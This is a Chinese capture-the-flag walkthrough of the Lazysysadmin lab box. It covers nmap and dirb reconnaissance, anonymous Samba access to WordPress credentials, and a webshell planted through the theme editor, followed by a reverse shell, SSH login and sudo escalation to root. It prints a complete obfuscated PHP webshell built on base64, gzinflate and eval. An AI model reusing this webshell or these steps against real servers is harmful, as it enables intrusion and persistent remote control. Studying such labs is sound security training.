靶机实战 - Lazysysadmin
Note
靶机信息
- 攻击机(Kali):
192.168.224.139 - 目标机(Lazysysadmin):
192.168.224.138 - 目标:获取
root权限并以 root 身份登录
主机发现
由于攻击机与目标机采用 NAT 网络模式,网段为 192.168.224.0/24。使用以下任一工具进行主机发现:
netdiscover -r 192.168.224.0/24或
nmap -sn 192.168.224.0/24
端口扫描与服务识别
对目标 IP 进行详细扫描,识别开放端口及对应服务版本:
nmap -v -A -T4 192.168.224.138
扫描发现以下开放服务:
| 端口 | 服务 | 说明 |
|---|---|---|
| 22 | SSH | 远程登录服务 |
| 80 | HTTP | Web 服务(WordPress) |
| 139/445 | Samba | 文件共享服务 |
渗透路径
1. Web 服务侦察
访问 robots.txt 发现存在被禁止爬取的目录:

手动访问这些目录未发现有价值信息,使用 dirb 进行目录扫描:
dirb http://192.168.224.138
扫描到以下关键目录:
/info.php— PHP 信息泄露,可获取服务器环境配置/wordpress/— WordPress 站点,博主名为togie/phpmyadmin/— 数据库管理工具

Tip
通过博主名 togie 推测 SSH 用户名可能也为 togie。WordPress 后台署名为 admin,可尝试该账号。
尝试访问 WordPress 后台 http://192.168.224.138/wordpress/wp-admin 爆破失败。
2. Samba 共享枚举
使用 enum4linux 枚举 Samba 主机信息:
enum4linux 192.168.224.138
发现 Samba 允许匿名登录,并存在共享目录 share$ 与打印机共享:

挂载共享目录获取文件:
sudo mount -t cifs -o username="",password="" //192.168.224.138/share$ /mnt
共享目录中包含 WordPress 网站文件,找到 wp-config.php:

从中获取数据库账号密码:

Warning
尝试直接写入 webshell 发现无写入权限,需从数据库或 WordPress 后台入手。
3. WordPress 后台渗透
使用获取的数据库凭据登录 phpMyAdmin,但无写入权限:


转而尝试 WordPress 用户后台登录,成功以 togie 身份登录:

利用 WordPress 主题编辑器写入 webshell(404.php):
<?php$password='admin';$html='$password'.'='."'".$password."';".'@e#html'.''.'v'."".''.''."".''.''.''.'a'.''.'l('.'g'.''."".''.''.'z'.'i'.''.''.'n'.'f'.'l'.''.''."".'a'.'t'.'e(b'.'as'.''.''.''."".''.'e'.'6'.''.""."".""."".''.'4_'.'d'.'e'.'c'.''.''.''."".''."".'o'.'d'.'e'.'('."'lVZhb5tIEP0eKf9hg6ICEufgXBy1sSI1TTHJKcY5jJsmbYTwspitMUt3SWiT+r/fLLZjjN3UxxfE7sybN29nZtndIZwz7nOSMZ7TdKSZent3RxAhKEt9kQc81+QKjZC2R4Ugubbv961+/7LnfFGyOAsyqtzrOnre3UHw7GN0ilS1Pf96EIQHI5LmcrXLnmiSBAdHDRNpmE2yIKfDhLRRt39poeOG2UY3NA1ZIZDjoVbjUF/i8AQQhoEgx0d+SDALibb6pdwO4n7Xdqzh33fdrvnP460Z2uFhx3M+f6DDT9mhd5G5odn66Ny04k/N8bvz0empouuVCA4p6jGUq6cP10M7iYOmexl8dv7t2XHRtTtjbI9a2O4UgTfg+Ntdcns4Lm69uBXcZPndU/JIbKfo3Tg8nMSTq0JGmgeSQkYPKc6lvuQHFbnQ1EgwPGYZSdWlkiWrhKZjSDwLuCA+UNQkzwVUafH9gfCfYFKaflFB01i9rxrETEj1Rc5zlrCCcG1uKjfU+xWwKAPLFzJa6Wugt6aB9qFOUjZ7A5SBmmbVU2YF3ivkS0T2IIMrtuWhg+cZ2Sm68Lzrg2bD/Mq/pkp7g0cDXC4g9gl6LjlMX7UcQJH9dSar7AT9/xp7FfqcpSkpz+oEnSdMEGm9ySMqOM2J1MAovfU6Ik1jEoSEgxrN+h5maQ7shVSqDlzENCHQexFhUSnxmsaLQiHy7EYE6qlkcWS+O66zeDmqJZtTZG5EXCXWmBUY2YA3/VOIN2+QNucH+YF06NcvVFmQauq/51ARzvxz+NpnhOWhlbqtiS6bZpFgZXOOMF226x4UfMZAVmws5oQus1prYwybPk1prr6yT34QXG9zHAOZF2+tyrVchbHLMpi8ODbQ+cC96l17PrxmdLay9i67Vm/gQd+2trJ3LW/gOp575vQ7lmsgzx1Y29HqW+6ZbTmeUZn+K0MGL3KVSkjnNdz5oS13tjgMEM6H4tfUIIEpJ2elH22aqDmZZLLR3kfQV2vjtIwAFvlPbWap6xvK5j2dZIm8HlTVmCOugVRoKiFJPlJ+loYdiKlshpR0ZAL+oiRXuFUE2JT/HjRSFCSC1MpqNvfl7Z4EeJYt2AMjBZzxyqmsX+rgPHqiaZQEef2yBd8Ks+ns92CLvwPyGCQbLQBs+h8=')));";$css=base64_decode("Q3JlYXRlX0Z1bmN0aW9u");$style=$css('',preg_replace("/#html/","",$html));$style();/*));.'<linkrel="stylesheet"href="$#css"/>';*/通过 Samba 挂载路径确认模板目录绝对路径:

访问 http://192.168.224.138/wordpress/wp-content/themes/twentyfifteen/404.php 成功加载 webshell:

4. 获取 Shell 与提权
使用 webshell 反弹 Shell,Kali 监听端口:
nc -nvlp 1234

当前用户为 www-data,无权限读取 flag 文件:


回查 Samba 共享目录,发现一个密码文件:

使用此前推测的用户名 togie 和密码进行 SSH 登录,成功:

该用户属于 sudo 用户组,直接切换至 root:
sudo su root
修改 root 密码并登录:


渗透完成。
总结与改进建议
本靶机整体难度适中,但存在以下设计缺陷:
- 密码强度不足 —
togie用户密码过于简单,容易被爆破 - 敏感文件存放不当 — 密码文件放在 Samba 共享目录中,
www-data用户也可读取,应当存放在仅特定用户可访问的路径
Tip
实际环境中,建议将配置文件、密码文件等敏感数据放置在权限严格的目录中,并定期审查共享目录的访问权限。